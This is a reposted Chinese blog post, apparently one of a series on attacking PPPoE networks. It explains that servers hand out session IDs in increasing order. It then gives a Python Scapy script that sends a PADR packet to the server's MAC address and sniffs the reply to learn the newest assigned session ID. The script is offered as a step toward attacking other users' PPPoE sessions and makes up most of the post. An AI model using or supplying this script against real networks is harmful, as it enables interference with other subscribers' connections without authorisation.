首页 > 代码库 > PPPoE攻击3:获取最新的sessionid
PPPoE攻击3:获取最新的sessionid
在PPPoE会话的发现阶段,服务器会向客户端分配sessionid,而经过本人测试,这个sessionid的值是依次增大的;即:进行一次会话,得到sessionid为1,这时其他客户端进行拨号时,分配的sessionid为2,依次类推......
那么,如何得到当前已经分配的sessionid范围呢?我们可以模拟一下PPPoE会话,得到新的sessionid。
实现本功能的代码如下:
from scapy.all import * #你的PPPoE服务器的mac地址,请酌情修改 servermac="00:0c:29:c6:ab:bc" #定义PPPoE数据包的格式 def packet(code=0x09,len=0,macadd=‘ff:ff:ff:ff:ff:ff‘): a=Ether()/PPPoE() a.dst=macadd a.type=0x8863 a.payload.version=1 a.payload.type=1 a.payload.code=code a.payload.len=len return a #发送PADR数据包 sendp(packet(macadd=servermac,code=0x19)) #嗅探网卡得到的数据 c=sniff(filter=‘pppoed‘,count=1) #PPPoE服务器返回的数据包(报文包含sessionid) print ‘PPPoE服务器的最新sessionid是 ‘+c[0].payload.sessionid
本文出自 “python小程序” 博客,请务必保留此出处http://mdh6789.blog.51cto.com/7270513/1569859
PPPoE攻击3:获取最新的sessionid
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。